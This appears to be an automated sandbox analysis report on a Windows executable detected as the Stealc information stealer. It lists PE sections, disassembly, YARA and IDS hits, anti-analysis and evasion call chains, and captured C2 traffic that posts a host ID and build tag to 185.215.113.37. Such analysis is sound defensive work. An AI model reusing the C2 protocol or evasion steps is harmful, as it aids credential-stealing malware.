                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+eax*4], cl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              pop es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+eax], bl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [eax+00000000h], eax
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add cl, byte ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [eax+00000000h], eax
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x2280037e66ac48966f83a344852b047606034unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2970000x200335005d3834a64c10ffbc5c88645f330unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              letztgfz0x4f50000x1970000x196a001aac734bf41dc075c2085c934b45ed6eFalse0.9949451708038733data7.95471366265782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              rrfcshya0x68c0000x10000x40035a425c14942f3085636dad7b78272c7False0.7236328125data5.753655644270787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x68d0000x30000x220076d94384303b7bf70efd884750171af8False0.06192555147058824DOS executable (COM)0.680114413842498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-24T18:08:02.054638+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 24, 2024 18:08:00.860810995 CEST4973080192.168.2.4185.215.113.37
                              Oct 24, 2024 18:08:00.866451025 CEST8049730185.215.113.37192.168.2.4
                              Oct 24, 2024 18:08:00.866548061 CEST4973080192.168.2.4185.215.113.37
                              Oct 24, 2024 18:08:00.866677046 CEST4973080192.168.2.4185.215.113.37
                              Oct 24, 2024 18:08:00.871953011 CEST8049730185.215.113.37192.168.2.4
                              Oct 24, 2024 18:08:01.768033981 CEST8049730185.215.113.37192.168.2.4
                              Oct 24, 2024 18:08:01.768134117 CEST4973080192.168.2.4185.215.113.37
                              Oct 24, 2024 18:08:01.770798922 CEST4973080192.168.2.4185.215.113.37
                              Oct 24, 2024 18:08:01.776114941 CEST8049730185.215.113.37192.168.2.4
                              Oct 24, 2024 18:08:02.054524899 CEST8049730185.215.113.37192.168.2.4
                              Oct 24, 2024 18:08:02.054637909 CEST4973080192.168.2.4185.215.113.37
                              Oct 24, 2024 18:08:05.151302099 CEST4973080192.168.2.4185.215.113.37

                              HTTP Request Dependency Graph

                              • 185.215.113.37

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730185.215.113.37807348C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Oct 24, 2024 18:08:00.866677046 CEST89OUTGET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 24, 2024 18:08:01.768033981 CEST203INHTTP/1.1 200 OK
                              Date: Thu, 24 Oct 2024 16:08:01 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 24, 2024 18:08:01.770798922 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 44 32 33 35 38 38 36 46 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a
                              Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="hwid"E0D235886F872556134559------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="build"doma------DBGHJEBKJEGHJKECAAKJ--
                              Oct 24, 2024 18:08:02.054524899 CEST210INHTTP/1.1 200 OK
                              Date: Thu, 24 Oct 2024 16:08:01 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:12:07:57
                              Start date:24/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xdc0000
                              File size:1'821'696 bytes
                              MD5 hash:20A21EC73989A782B2B0243F0ED123BA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:8.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.1%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
                                execution_graph 13431 dd69f0 13476 dc2260 13431->13476 13455 dd6a64 13456 dda9b0 4 API calls 13455->13456 13457 dd6a6b 13456->13457 13458 dda9b0 4 API calls 13457->13458 13459 dd6a72 13458->13459 13460 dda9b0 4 API calls 13459->13460 13461 dd6a79 13460->13461 13462 dda9b0 4 API calls 13461->13462 13463 dd6a80 13462->13463 13628 dda8a0 13463->13628 13465 dd6b0c 13632 dd6920 GetSystemTime 13465->13632 13466 dd6a89 13466->13465 13469 dd6ac2 OpenEventA 13466->13469 13471 dd6ad9 13469->13471 13472 dd6af5 CloseHandle Sleep 13469->13472 13475 dd6ae1 CreateEventA 13471->13475 13474 dd6b0a 13472->13474 13474->13466 13475->13465 13829 dc45c0 13476->13829 13478 dc2274 13479 dc45c0 2 API calls 13478->13479 13480 dc228d 13479->13480 13481 dc45c0 2 API calls 13480->13481 13482 dc22a6 13481->13482 13483 dc45c0 2 API calls 13482->13483 13484 dc22bf 13483->13484 13485 dc45c0 2 API calls 13484->13485 13486 dc22d8 13485->13486 13487 dc45c0 2 API calls 13486->13487 13488 dc22f1 13487->13488 13489 dc45c0 2 API calls 13488->13489 13490 dc230a 13489->13490 13491 dc45c0 2 API calls 13490->13491 13492 dc2323 13491->13492 13493 dc45c0 2 API calls 13492->13493 13494 dc233c 13493->13494 13495 dc45c0 2 API calls 13494->13495 13496 dc2355 13495->13496 13497 dc45c0 2 API calls 13496->13497 13498 dc236e 13497->13498 13499 dc45c0 2 API calls 13498->13499 13500 dc2387 13499->13500 13501 dc45c0 2 API calls 13500->13501 13502 dc23a0 13501->13502 13503 dc45c0 2 API calls 13502->13503 13504 dc23b9 13503->13504 13505 dc45c0 2 API calls 13504->13505 13506 dc23d2 13505->13506 13507 dc45c0 2 API calls 13506->13507 13508 dc23eb 13507->13508 13509 dc45c0 2 API calls 13508->13509 13510 dc2404 13509->13510 13511 dc45c0 2 API calls 13510->13511 13512 dc241d 13511->13512 13513 dc45c0 2 API calls 13512->13513 13514 dc2436 13513->13514 13515 dc45c0 2 API calls 13514->13515 13516 dc244f 13515->13516 13517 dc45c0 2 API calls 13516->13517 13518 dc2468 13517->13518 13519 dc45c0 2 API calls 13518->13519 13520 dc2481 13519->13520 13521 dc45c0 2 API calls 13520->13521 13522 dc249a 13521->13522 13523 dc45c0 2 API calls 13522->13523 13524 dc24b3 13523->13524 13525 dc45c0 2 API calls 13524->13525 13526 dc24cc 13525->13526 13527 dc45c0 2 API calls 13526->13527 13528 dc24e5 13527->13528 13529 dc45c0 2 API calls 13528->13529 13530 dc24fe 13529->13530 13531 dc45c0 2 API calls 13530->13531 13532 dc2517 13531->13532 13533 dc45c0 2 API calls 13532->13533 13534 dc2530 13533->13534 13535 dc45c0 2 API calls 13534->13535 13536 dc2549 13535->13536 13537 dc45c0 2 API calls 13536->13537 13538 dc2562 13537->13538 13539 dc45c0 2 API calls 13538->13539 13540 dc257b 13539->13540 13541 dc45c0 2 API calls 13540->13541 13542 dc2594 13541->13542 13543 dc45c0 2 API calls 13542->13543 13544 dc25ad 13543->13544 13545 dc45c0 2 API calls 13544->13545 13546 dc25c6 13545->13546 13547 dc45c0 2 API calls 13546->13547 13548 dc25df 13547->13548 13549 dc45c0 2 API calls 13548->13549 13550 dc25f8 13549->13550 13551 dc45c0 2 API calls 13550->13551 13552 dc2611 13551->13552 13553 dc45c0 2 API calls 13552->13553 13554 dc262a 13553->13554 13555 dc45c0 2 API calls 13554->13555 13556 dc2643 13555->13556 13557 dc45c0 2 API calls 13556->13557 13558 dc265c 13557->13558 13559 dc45c0 2 API calls 13558->13559 13560 dc2675 13559->13560 13561 dc45c0 2 API calls 13560->13561 13562 dc268e 13561->13562 13563 dd9860 13562->13563 13834 dd9750 GetPEB 13563->13834 13565 dd9868 13566 dd987a 13565->13566 13567 dd9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13565->13567 13570 dd988c 21 API calls 13566->13570 13568 dd9b0d 13567->13568 13569 dd9af4 GetProcAddress 13567->13569 13571 dd9b46 13568->13571 13572 dd9b16 GetProcAddress GetProcAddress 13568->13572 13569->13568 13570->13567 13573 dd9b4f GetProcAddress 13571->13573 13574 dd9b68 13571->13574 13572->13571 13573->13574 13575 dd9b89 13574->13575 13576 dd9b71 GetProcAddress 13574->13576 13577 dd6a00 13575->13577 13578 dd9b92 GetProcAddress GetProcAddress 13575->13578 13576->13575 13579 dda740 13577->13579 13578->13577 13581 dda750 13579->13581 13580 dd6a0d 13583 dc11d0 13580->13583 13581->13580 13582 dda77e lstrcpy 13581->13582 13582->13580 13584 dc11e8 13583->13584 13585 dc120f ExitProcess 13584->13585 13586 dc1217 13584->13586 13587 dc1160 GetSystemInfo 13586->13587 13588 dc117c ExitProcess 13587->13588 13589 dc1184 13587->13589 13590 dc1110 GetCurrentProcess VirtualAllocExNuma 13589->13590 13591 dc1149 13590->13591 13592 dc1141 ExitProcess 13590->13592 13835 dc10a0 VirtualAlloc 13591->13835 13595 dc1220 13839 dd89b0 13595->13839 13598 dc129a 13601 dd6770 GetUserDefaultLangID 13598->13601 13599 dc1249 13599->13598 13600 dc1292 ExitProcess 13599->13600 13602 dd67d3 13601->13602 13603 dd6792 13601->13603 13609 dc1190 13602->13609 13603->13602 13604 dd67ad ExitProcess 13603->13604 13605 dd67cb ExitProcess 13603->13605 13606 dd67b7 ExitProcess 13603->13606 13607 dd67c1 ExitProcess 13603->13607 13608 dd67a3 ExitProcess 13603->13608 13605->13602 13610 dd78e0 3 API calls 13609->13610 13612 dc119e 13610->13612 13611 dc11cc 13616 dd7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13611->13616 13612->13611 13613 dd7850 3 API calls 13612->13613 13614 dc11b7 13613->13614 13614->13611 13615 dc11c4 ExitProcess 13614->13615 13617 dd6a30 13616->13617 13618 dd78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13617->13618 13619 dd6a43 13618->13619 13620 dda9b0 13619->13620 13841 dda710 13620->13841 13622 dda9c1 lstrlen 13624 dda9e0 13622->13624 13623 ddaa18 13842 dda7a0 13623->13842 13624->13623 13626 dda9fa lstrcpy lstrcat 13624->13626 13626->13623 13627 ddaa24 13627->13455 13629 dda8bb 13628->13629 13630 dda90b 13629->13630 13631 dda8f9 lstrcpy 13629->13631 13630->13466 13631->13630 13846 dd6820 13632->13846 13634 dd698e 13635 dd6998 sscanf 13634->13635 13875 dda800 13635->13875 13637 dd69aa SystemTimeToFileTime SystemTimeToFileTime 13638 dd69ce 13637->13638 13639 dd69e0 13637->13639 13638->13639 13640 dd69d8 ExitProcess 13638->13640 13641 dd5b10 13639->13641 13642 dd5b1d 13641->13642 13643 dda740 lstrcpy 13642->13643 13644 dd5b2e 13643->13644 13877 dda820 lstrlen 13644->13877 13647 dda820 2 API calls 13648 dd5b64 13647->13648 13649 dda820 2 API calls 13648->13649 13650 dd5b74 13649->13650 13881 dd6430 13650->13881 13653 dda820 2 API calls 13654 dd5b93 13653->13654 13655 dda820 2 API calls 13654->13655 13656 dd5ba0 13655->13656 13657 dda820 2 API calls 13656->13657 13658 dd5bad 13657->13658 13659 dda820 2 API calls 13658->13659 13660 dd5bf9 13659->13660 13890 dc26a0 13660->13890 13668 dd5cc3 13669 dd6430 lstrcpy 13668->13669 13670 dd5cd5 13669->13670 13671 dda7a0 lstrcpy 13670->13671 13672 dd5cf2 13671->13672 13673 dda9b0 4 API calls 13672->13673 13674 dd5d0a 13673->13674 13675 dda8a0 lstrcpy 13674->13675 13676 dd5d16 13675->13676 13677 dda9b0 4 API calls 13676->13677 13678 dd5d3a 13677->13678 13679 dda8a0 lstrcpy 13678->13679 13680 dd5d46 13679->13680 13681 dda9b0 4 API calls 13680->13681 13682 dd5d6a 13681->13682 13683 dda8a0 lstrcpy 13682->13683 13684 dd5d76 13683->13684 13685 dda740 lstrcpy 13684->13685 13686 dd5d9e 13685->13686 14616 dd7500 GetWindowsDirectoryA 13686->14616 13689 dda7a0 lstrcpy 13690 dd5db8 13689->13690 14626 dc4880 13690->14626 13692 dd5dbe 14771 dd17a0 13692->14771 13694 dd5dc6 13695 dda740 lstrcpy 13694->13695 13696 dd5de9 13695->13696 13697 dc1590 lstrcpy 13696->13697 13698 dd5dfd 13697->13698 14787 dc5960 13698->14787 13700 dd5e03 14931 dd1050 13700->14931 13702 dd5e0e 13703 dda740 lstrcpy 13702->13703 13704 dd5e32 13703->13704 13705 dc1590 lstrcpy 13704->13705 13706 dd5e46 13705->13706 13707 dc5960 34 API calls 13706->13707 13708 dd5e4c 13707->13708 14935 dd0d90 13708->14935 13710 dd5e57 13711 dda740 lstrcpy 13710->13711 13712 dd5e79 13711->13712 13713 dc1590 lstrcpy 13712->13713 13714 dd5e8d 13713->13714 13715 dc5960 34 API calls 13714->13715 13716 dd5e93 13715->13716 14942 dd0f40 13716->14942 13718 dd5e9e 13719 dc1590 lstrcpy 13718->13719 13720 dd5eb5 13719->13720 14947 dd1a10 13720->14947 13722 dd5eba 13723 dda740 lstrcpy 13722->13723 13724 dd5ed6 13723->13724 15291 dc4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13724->15291 13726 dd5edb 13727 dc1590 lstrcpy 13726->13727 13728 dd5f5b 13727->13728 15298 dd0740 13728->15298 13730 dd5f60 13731 dda740 lstrcpy 13730->13731 13732 dd5f86 13731->13732 13733 dc1590 lstrcpy 13732->13733 13734 dd5f9a 13733->13734 13735 dc5960 34 API calls 13734->13735 13736 dd5fa0 13735->13736 13830 dc45d1 RtlAllocateHeap 13829->13830 13833 dc4621 VirtualProtect 13830->13833 13833->13478 13834->13565 13836 dc10c2 codecvt 13835->13836 13837 dc10fd 13836->13837 13838 dc10e2 VirtualFree 13836->13838 13837->13595 13838->13837 13840 dc1233 GlobalMemoryStatusEx 13839->13840 13840->13599 13841->13622 13843 dda7c2 13842->13843 13844 dda7ec 13843->13844 13845 dda7da lstrcpy 13843->13845 13844->13627 13845->13844 13847 dda740 lstrcpy 13846->13847 13848 dd6833 13847->13848 13849 dda9b0 4 API calls 13848->13849 13850 dd6845 13849->13850 13851 dda8a0 lstrcpy 13850->13851 13852 dd684e 13851->13852 13853 dda9b0 4 API calls 13852->13853 13854 dd6867 13853->13854 13855 dda8a0 lstrcpy 13854->13855 13856 dd6870 13855->13856 13857 dda9b0 4 API calls 13856->13857 13858 dd688a 13857->13858 13859 dda8a0 lstrcpy 13858->13859 13860 dd6893 13859->13860 13861 dda9b0 4 API calls 13860->13861 13862 dd68ac 13861->13862 13863 dda8a0 lstrcpy 13862->13863 13864 dd68b5 13863->13864 13865 dda9b0 4 API calls 13864->13865 13866 dd68cf 13865->13866 13867 dda8a0 lstrcpy 13866->13867 13868 dd68d8 13867->13868 13869 dda9b0 4 API calls 13868->13869 13870 dd68f3 13869->13870 13871 dda8a0 lstrcpy 13870->13871 13872 dd68fc 13871->13872 13873 dda7a0 lstrcpy 13872->13873 13874 dd6910 13873->13874 13874->13634 13876 dda812 13875->13876 13876->13637 13878 dda83f 13877->13878 13879 dd5b54 13878->13879 13880 dda87b lstrcpy 13878->13880 13879->13647 13880->13879 13882 dda8a0 lstrcpy 13881->13882 13883 dd6443 13882->13883 13884 dda8a0 lstrcpy 13883->13884 13885 dd6455 13884->13885 13886 dda8a0 lstrcpy 13885->13886 13887 dd6467 13886->13887 13888 dda8a0 lstrcpy 13887->13888 13889 dd5b86 13888->13889 13889->13653 13891 dc45c0 2 API calls 13890->13891 13892 dc26b4 13891->13892 13893 dc45c0 2 API calls 13892->13893 13894 dc26d7 13893->13894 13895 dc45c0 2 API calls 13894->13895 13896 dc26f0 13895->13896 13897 dc45c0 2 API calls 13896->13897 13898 dc2709 13897->13898 13899 dc45c0 2 API calls 13898->13899 13900 dc2736 13899->13900 13901 dc45c0 2 API calls 13900->13901 13902 dc274f 13901->13902 13903 dc45c0 2 API calls 13902->13903 13904 dc2768 13903->13904 13905 dc45c0 2 API calls 13904->13905 13906 dc2795 13905->13906 13907 dc45c0 2 API calls 13906->13907 13908 dc27ae 13907->13908 13909 dc45c0 2 API calls 13908->13909 13910 dc27c7 13909->13910 13911 dc45c0 2 API calls 13910->13911 13912 dc27e0 13911->13912 13913 dc45c0 2 API calls 13912->13913 13914 dc27f9 13913->13914 13915 dc45c0 2 API calls 13914->13915 13916 dc2812 13915->13916 13917 dc45c0 2 API calls 13916->13917 13918 dc282b 13917->13918 13919 dc45c0 2 API calls 13918->13919 13920 dc2844 13919->13920 13921 dc45c0 2 API calls 13920->13921 13922 dc285d 13921->13922 13923 dc45c0 2 API calls 13922->13923 13924 dc2876 13923->13924 13925 dc45c0 2 API calls 13924->13925 13926 dc288f 13925->13926 13927 dc45c0 2 API calls 13926->13927 13928 dc28a8 13927->13928 13929 dc45c0 2 API calls 13928->13929 13930 dc28c1 13929->13930 13931 dc45c0 2 API calls 13930->13931 13932 dc28da 13931->13932 13933 dc45c0 2 API calls 13932->13933 13934 dc28f3 13933->13934 13935 dc45c0 2 API calls 13934->13935 13936 dc290c 13935->13936 13937 dc45c0 2 API calls 13936->13937 13938 dc2925 13937->13938 13939 dc45c0 2 API calls 13938->13939 13940 dc293e 13939->13940 13941 dc45c0 2 API calls 13940->13941 13942 dc2957 13941->13942 13943 dc45c0 2 API calls 13942->13943 13944 dc2970 13943->13944 13945 dc45c0 2 API calls 13944->13945 13946 dc2989 13945->13946 13947 dc45c0 2 API calls 13946->13947 13948 dc29a2 13947->13948 13949 dc45c0 2 API calls 13948->13949 13950 dc29bb 13949->13950 13951 dc45c0 2 API calls 13950->13951 13952 dc29d4 13951->13952 13953 dc45c0 2 API calls 13952->13953 13954 dc29ed 13953->13954 13955 dc45c0 2 API calls 13954->13955 13956 dc2a06 13955->13956 13957 dc45c0 2 API calls 13956->13957 13958 dc2a1f 13957->13958 13959 dc45c0 2 API calls 13958->13959 13960 dc2a38 13959->13960 13961 dc45c0 2 API calls 13960->13961 13962 dc2a51 13961->13962 13963 dc45c0 2 API calls 13962->13963 13964 dc2a6a 13963->13964 13965 dc45c0 2 API calls 13964->13965 13966 dc2a83 13965->13966 13967 dc45c0 2 API calls 13966->13967 13968 dc2a9c 13967->13968 13969 dc45c0 2 API calls 13968->13969 13970 dc2ab5 13969->13970 13971 dc45c0 2 API calls 13970->13971 13972 dc2ace 13971->13972 13973 dc45c0 2 API calls 13972->13973 13974 dc2ae7 13973->13974 13975 dc45c0 2 API calls 13974->13975 13976 dc2b00 13975->13976 13977 dc45c0 2 API calls 13976->13977 13978 dc2b19 13977->13978 13979 dc45c0 2 API calls 13978->13979 13980 dc2b32 13979->13980 13981 dc45c0 2 API calls 13980->13981 13982 dc2b4b 13981->13982 13983 dc45c0 2 API calls 13982->13983 13984 dc2b64 13983->13984 13985 dc45c0 2 API calls 13984->13985 13986 dc2b7d 13985->13986 13987 dc45c0 2 API calls 13986->13987 13988 dc2b96 13987->13988 13989 dc45c0 2 API calls 13988->13989 13990 dc2baf 13989->13990 13991 dc45c0 2 API calls 13990->13991 13992 dc2bc8 13991->13992 13993 dc45c0 2 API calls 13992->13993 13994 dc2be1 13993->13994 13995 dc45c0 2 API calls 13994->13995 13996 dc2bfa 13995->13996 13997 dc45c0 2 API calls 13996->13997 13998 dc2c13 13997->13998 13999 dc45c0 2 API calls 13998->13999 14000 dc2c2c 13999->14000 14001 dc45c0 2 API calls 14000->14001 14002 dc2c45 14001->14002 14003 dc45c0 2 API calls 14002->14003 14004 dc2c5e 14003->14004 14005 dc45c0 2 API calls 14004->14005 14006 dc2c77 14005->14006 14007 dc45c0 2 API calls 14006->14007 14008 dc2c90 14007->14008 14009 dc45c0 2 API calls 14008->14009 14010 dc2ca9 14009->14010 14011 dc45c0 2 API calls 14010->14011 14012 dc2cc2 14011->14012 14013 dc45c0 2 API calls 14012->14013 14014 dc2cdb 14013->14014 14015 dc45c0 2 API calls 14014->14015 14016 dc2cf4 14015->14016 14017 dc45c0 2 API calls 14016->14017 14018 dc2d0d 14017->14018 14019 dc45c0 2 API calls 14018->14019 14020 dc2d26 14019->14020 14021 dc45c0 2 API calls 14020->14021 14022 dc2d3f 14021->14022 14023 dc45c0 2 API calls 14022->14023 14024 dc2d58 14023->14024 14025 dc45c0 2 API calls 14024->14025 14026 dc2d71 14025->14026 14027 dc45c0 2 API calls 14026->14027 14028 dc2d8a 14027->14028 14029 dc45c0 2 API calls 14028->14029 14030 dc2da3 14029->14030 14031 dc45c0 2 API calls 14030->14031 14032 dc2dbc 14031->14032 14033 dc45c0 2 API calls 14032->14033 14034 dc2dd5 14033->14034 14035 dc45c0 2 API calls 14034->14035 14036 dc2dee 14035->14036 14037 dc45c0 2 API calls 14036->14037 14038 dc2e07 14037->14038 14039 dc45c0 2 API calls 14038->14039 14040 dc2e20 14039->14040 14041 dc45c0 2 API calls 14040->14041 14042 dc2e39 14041->14042 14043 dc45c0 2 API calls 14042->14043 14044 dc2e52 14043->14044 14045 dc45c0 2 API calls 14044->14045 14046 dc2e6b 14045->14046 14047 dc45c0 2 API calls 14046->14047 14048 dc2e84 14047->14048 14049 dc45c0 2 API calls 14048->14049 14050 dc2e9d 14049->14050 14051 dc45c0 2 API calls 14050->14051 14052 dc2eb6 14051->14052 14053 dc45c0 2 API calls 14052->14053 14054 dc2ecf 14053->14054 14055 dc45c0 2 API calls 14054->14055 14056 dc2ee8 14055->14056 14057 dc45c0 2 API calls 14056->14057 14058 dc2f01 14057->14058 14059 dc45c0 2 API calls 14058->14059 14060 dc2f1a 14059->14060 14061 dc45c0 2 API calls 14060->14061 14062 dc2f33 14061->14062 14063 dc45c0 2 API calls 14062->14063 14064 dc2f4c 14063->14064 14065 dc45c0 2 API calls 14064->14065 14066 dc2f65 14065->14066 14067 dc45c0 2 API calls 14066->14067 14068 dc2f7e 14067->14068 14069 dc45c0 2 API calls 14068->14069 14070 dc2f97 14069->14070 14071 dc45c0 2 API calls 14070->14071 14072 dc2fb0 14071->14072 14073 dc45c0 2 API calls 14072->14073 14074 dc2fc9 14073->14074 14075 dc45c0 2 API calls 14074->14075 14076 dc2fe2 14075->14076 14077 dc45c0 2 API calls 14076->14077 14078 dc2ffb 14077->14078 14079 dc45c0 2 API calls 14078->14079 14080 dc3014 14079->14080 14081 dc45c0 2 API calls 14080->14081 14082 dc302d 14081->14082 14083 dc45c0 2 API calls 14082->14083 14084 dc3046 14083->14084 14085 dc45c0 2 API calls 14084->14085 14086 dc305f 14085->14086 14087 dc45c0 2 API calls 14086->14087 14088 dc3078 14087->14088 14089 dc45c0 2 API calls 14088->14089 14090 dc3091 14089->14090 14091 dc45c0 2 API calls 14090->14091 14092 dc30aa 14091->14092 14093 dc45c0 2 API calls 14092->14093 14094 dc30c3 14093->14094 14095 dc45c0 2 API calls 14094->14095 14096 dc30dc 14095->14096 14097 dc45c0 2 API calls 14096->14097 14098 dc30f5 14097->14098 14099 dc45c0 2 API calls 14098->14099 14100 dc310e 14099->14100 14101 dc45c0 2 API calls 14100->14101 14102 dc3127 14101->14102 14103 dc45c0 2 API calls 14102->14103 14104 dc3140 14103->14104 14105 dc45c0 2 API calls 14104->14105 14106 dc3159 14105->14106 